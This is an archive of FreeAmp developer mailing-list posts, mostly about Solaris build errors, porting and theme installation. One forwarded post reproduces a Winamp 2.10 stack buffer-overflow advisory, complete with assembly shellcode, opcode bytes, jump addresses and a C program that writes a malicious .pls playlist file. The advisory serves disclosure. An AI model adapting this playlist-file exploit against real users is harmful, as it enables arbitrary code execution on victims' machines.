Re: pocketpc
On Thu, Mar 22, 2001 at 10:47:24AM -0800, Mark B. Elrod wrote: send us an iPaq and we'll be glad to get it working! grin I was wondering if anyone had any luck building Freeamp using Microsoft's tools for PocketPC. From what I've heard, it should be fairly seamless. A friend of mine just bought an iPaq, and a 1gb Microdrive. The 'MyMusic' interface would be perfect for the ipaq as it lacks much in the way of a directory explorer. Since MS Media player comes with PocketPC which supports MP3 and MS's format, you could probably call their decoder anyway. Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Error compiling on SOlaris 2.7
I'm having a problem compiling freeamp on Solaris 2.7. c++ -I. -I. -I./config -DUNIX_LIBDIR=\"/usr/local/lib\" -Dsolaris -I. -I./lib/gd bm -I./base/include -I./config -I./io/include -I./ui/include -I./lmc/include -I. /base/unix/include -I./base/unix/solaris/include -I./io/soundcard/unix/solaris/i nclude -I./lmc/xingmp3/include -I./lmc/cd/include -I./plm/portable/pmp300/sba -I ./lib/xml/include -I./lib/zlib/include -I./lib/unzip/include -I./io/cd/unix/incl ude -I./base/aps -I./io/wavout/include -I./ui/lcd/include -I./ui/irman/include - I./lib/http/include -I./io/signature/include -I./lmc/vorbis/include -O2 -fpermis sive -D_REENTRANT-c base/aps/apsinterface.cpp -o base/aps/apsinterface.o base/aps/apsinterface.cpp:56: musicbrainz/mb_c.h: No such file or directory gmake: *** [base/aps/apsinterface.o] Error 1 I also had to remove an include (I think fstream.h) from a file as it caused a confilct in a function (I'm sorry about being vague it was late night a couple of days ago). Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Re: freeamp UI MouseMove
On Tue, Jul 11, 2000 at 11:59:09AM -0700, Mark B. Elrod wrote: io/include/pmo.h:75:void PhysicalMediaOutput::GetVolume(int32 , int32 ) io/include/pmo.h:76:void PhysicalMediaOutput::SetVolume(int, int) have not been defined for the solaris SoundCardPMO. define them and it should compile. how/where - I'm not a C++ person ? Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Re: Soralis build error (was Re: freeamp UI MouseMove)
On Tue, Jul 11, 2000 at 02:11:15PM -0500, Hiromasa Kato wrote:
I don't have a solaris machine with me, but a quick look at
io/soundcard/unix/solaris/soundcardpmo.cpp suggests that
1)PMO::GetVolume and PMO::SetVolume changed the interface recently,
so the old GetVolume/SetVolume implementations are not recognized as
inherited virtual methods. They are abstract methods in PMO.
2)The file got somehow polluted, it says "PMO::GetPrefInt32(kVolumePref,
and such.
I had the same problem with the beos soundcardpmo.cpp. The solution is
to implement the methods with the correct interface. They should look like,
void
SoundcardPMO::GetVolume(int32 left, int32 right)
{
// fill the volume levels in left and right.
}
void
SoundcardPMO::SetVolume(int32 left, int32 right)
{
}
I changed the source files above (only adding the int32 stuff)
gmake -f Makefile-plugins - plugins-cc
gmake[1]: Entering directory `/home/steve/freeamp'
c++ -I. -I. -I./config -DUNIX_LIBDIR=\"/usr/local/lib\" -Dsolaris -I./lib/gdbm -
I./base/include -Iconfig -I./io/include -I./ui/include -I./lmc/include -I./base/
unix/include -I./base/unix/solaris/include -I./io/soundcard/unix/solaris/include
-I./ui/lcd/include -I./ui/irman/include -I./lmc/xingmp3/include -I./lmc/cd/incl
ude -I./plm/portable/pmp300/sba -I./lib/xml/include -I./lib/zlib/include -I./lib
/unzip/include -I./io/cd/include -I./io/cd/unix/include -I./io/wavout/include -I
./lib/http/include -Wall -g -O2 -D_REENTRANT -fPIC -c io/soundcard/unix/solar
is/src/soundcardpmo.cpp -o io/soundcard/unix/solaris/src/soundcardpmo.o
io/soundcard/unix/solaris/src/soundcardpmo.cpp: In function `class PhysicalMedia
Output * Initialize(FAContext *)':
io/soundcard/unix/solaris/src/soundcardpmo.cpp:50: cannot allocate an object of
type `SoundCardPMO'
io/soundcard/unix/solaris/src/soundcardpmo.cpp:50: since the following virtual
functions are abstract:
io/include/pmo.h:74:void PhysicalMediaOutput::GetVolume(int32 , int32 )
io/include/pmo.h:75:void PhysicalMediaOutput::SetVolume(int, int)
io/soundcard/unix/solaris/src/soundcardpmo.cpp: At top level:
io/soundcard/unix/solaris/src/soundcardpmo.cpp:103: prototype for `void SoundCar
dPMO::SetVolume(int, int)' does not match any in class `SoundCardPMO'
io/soundcard/unix/solaris/include/soundcardpmo.h:68: candidate is: void SoundCar
dPMO::SetVolume(int)
io/soundcard/unix/solaris/src/soundcardpmo.cpp: In method `void SoundCardPMO::Se
tVolume(int, int)':
io/soundcard/unix/solaris/src/soundcardpmo.cpp:108: `v' undeclared (first use th
is function)
io/soundcard/unix/solaris/src/soundcardpmo.cpp:108: (Each undeclared identifier
is reported only once
io/soundcard/unix/solaris/src/soundcardpmo.cpp:108: for each function it appears
in.)
io/soundcard/unix/solaris/src/soundcardpmo.cpp: At top level:
io/soundcard/unix/solaris/src/soundcardpmo.cpp:115: prototype for `void SoundCar
dPMO::GetVolume(int32 , int32 )' does not match any in class `SoundCardPMO'
io/soundcard/unix/solaris/include/soundcardpmo.h:67: candidate is: int32 SoundCa
rdPMO::GetVolume()
io/soundcard/unix/solaris/src/soundcardpmo.cpp: In method `void SoundCardPMO::Ge
tVolume(int32 , int32 )':
io/soundcard/unix/solaris/src/soundcardpmo.cpp:125: `return' with a value, in fu
nction returning void
gmake[1]: *** [io/soundcard/unix/solaris/src/soundcardpmo.o] Error 1
gmake[1]: Leaving directory `/home/steve/freeamp'
gmake: *** [plugins-cc] Error 2
Steve
--
NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455
Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU
mobile 07775 755503 Epage [EMAIL PROTECTED] [body only]
___
[EMAIL PROTECTED]
http://www.freeamp.org/mailman/listinfo/freeamp-dev
Re: Compile problem on Solaris
On Fri, Mar 17, 2000 at 02:13:50AM +0100, Björn Wingman wrote: base/src/downloadmanager.cpp:724: passing `const sockaddr *' as argument 2 of `c onnect(int, sockaddr *, int)' discards qualifiers gmake: *** [base/src/downloadmanager.o] Error 1 Hmm...it compiles nicely for me, no warnings at all on my: SunOS 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10 with gcc 2.95.2. I compiled on Sun Sparc20, Solaris 2.6, gcc 2.95.1 Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Re: Windows NT sound interface code
On Thu, Mar 16, 2000 at 11:43:23AM -0800, Mark B. Elrod wrote: just as a data point i am running Nt 4 on a dual processor p3-500 with a SBLive! card just fine with FreeAmp. Running a dual P-III 600 with SBLive, work fine with FreeAmp, however the system does seem to go unstable after a while, but I've been told that this is due to the number of cards I've got in the system (and it loses interrupts of something, ps NT4 SP6+). Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Compile problem on Solaris
As requested: - c++ -I. -I. -I./config -DUNIX_LIBDIR=\"/usr/local/lib\" -Dsolaris -I./lib/gdbm - I./base/include -Iconfig -I./io/include -I./ui/include -I./lmc/include -I./base/ unix/include -I./base/unix/solaris/include -I./io/soundcard/unix/solaris/include -I./ui/lcd/include -I./ui/irman/include -I./lmc/xingmp3/include -I./lmc/cd/incl ude -I./plm/portable/pmp300/sba -I./lib/xml/include -I./lib/zlib/include -I./io/ cd/include -I./io/cd/unix/include -Wall -Wno-return-type -g -O2 -D_REENTRANT -c base/src/downloadmanager.cpp -o base/src/downloadmanager.o base/src/downloadmanager.cpp: In method `enum Error DownloadManager::Download(Do wnloadItem *)': base/src/downloadmanager.cpp:724: passing `const sockaddr *' as argument 2 of `c onnect(int, sockaddr *, int)' discards qualifiers gmake: *** [base/src/downloadmanager.o] Error 1 Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2,43 Howitt Road, Belsize Park,London NW3 4LU mobile 07775 755503 Epage [EMAIL PROTECTED] [body only] ___ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
Winamp buffer offerflow bug
FYI
-Original Message-
From: darkplan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, January 04, 2000 4:15 PM
To: [EMAIL PROTECTED]
Subject: Winamp buffer overflow advisory
Nullsoft Winamp 2.10 buffer overflow advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: Steve Fewer, [EMAIL PROTECTED]
http://indigo.ie/~lmf
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Introduction:
I recently uncovered a stack based buffer overflow in winamp
version 2.10 which lets me execute 'arbitrary code'. It is
carried out through .pls files which winamp uses for playlists.
This is unnerving as it is a feasible plan to trade playlists on
irc during a mp3 trading session with someone.
The overflow occurs when an entry greater than 580 bytes is
read in from a .pls file. The EIP is the only register overwritten
in the next four bytes that follow, from there on is space for
your shell code. eg.
[playlist]
File1=580 byteseipshell code
NumberOfEntries=1
The first 580 bytes get mangled around in memory but the 585
byte (where our shell code starts) is pointed to by the ESP,
therefore a simple 'JMP ESP' or the like will land us back in
our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in
comctl32.dll which winamp loads. Pointing our EIP into that
address lands us back where we want to be.
This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.
The Shell Code:
The shell code I wrote for this simply displays a message box
and then calls exit(). However Winamp doesn't load msvcrt.dll
which is needed to call exit() so we have to load it ourselves.
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling Messagebox I used the address
0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It
didn't warrant using GetProcAddress for compatibilities sake.
For the OP codes see the exploit further on.
// This loads msvcrt.dll
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0xBFF776D4
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
// This calls MessageBox to say 'Hi!'
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr[ebp-04h],48h
mov byte ptr[ebp-03h],69h
mov byte ptr[ebp-02h],21h
mov edx, 0xBFF5412E
push edx
push edi
lea edx,[ebp-04h]
push edx
push edx
push edi
call dword ptr[ebp-08h]
// This calls exit()
push ebp
mov ebp,esp
mov edx,0x
sub edx,0x87FFAAFB
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
The Exploit:
-snip-
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at [EMAIL PROTECTED]
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include stdio.h
int main()
{
printf("\n\n\t\t...\n");
printf("\t\t..Nullsoft Winamp 2.10 exploit.\n");
printf("\t\t...\n");
printf("\t\t.Author: Steve Fewer, 04-01-2k.\n");
printf("\t\t.http://indigo.ie/~lmf.\n");
printf("\t\t...\n\n");
char buffer[640];
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2
E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF
4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xF
E\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xB
A\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=0;x580;x++)
{
buffer[x] = 0x90;
}
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
-snip-
Steve
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--
NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455
Flat 2, 43 Howitt Road, Belsize Park, London NW3 4LU
Epage [EMAIL PROTECTED] [body of text only]
Re: ANNOUNCE: *nix Beta of FreeAmp 2.0 available
On Tue, Oct 19, 1999 at 01:10:57PM -0400, Isaac Richards wrote: Sorry, no binary packages for now. Source is available at: http://www.freeamp.org/download/freeamp-2.0-beta1-unix-src.tar.bz2 or http://www.freeamp.org/download/freeamp-2.0-beta1-unix-src.tar.gz Should this work on Solaris 7 yet ? Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2, 43 Howitt Road, Belsize Park, London NW3 4LU Epage [EMAIL PROTECTED] [body of text only]
Re: where to install theme files to?
On Mon, Oct 04, 1999 at 10:57:31AM -0700, Mark B. Elrod wrote: i like option 2 as well. the only downside is that if a user gets an updated theme with the same name we might not recognize it unless they know to delete the folder it has been expanded to. how can we get around that? Themes could be versioned ? If a later version is detected, it overwrites the original one. Steve -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2, 43 Howitt Road, Belsize Park, London NW3 4LU Epage [EMAIL PROTECTED] [body of text only]
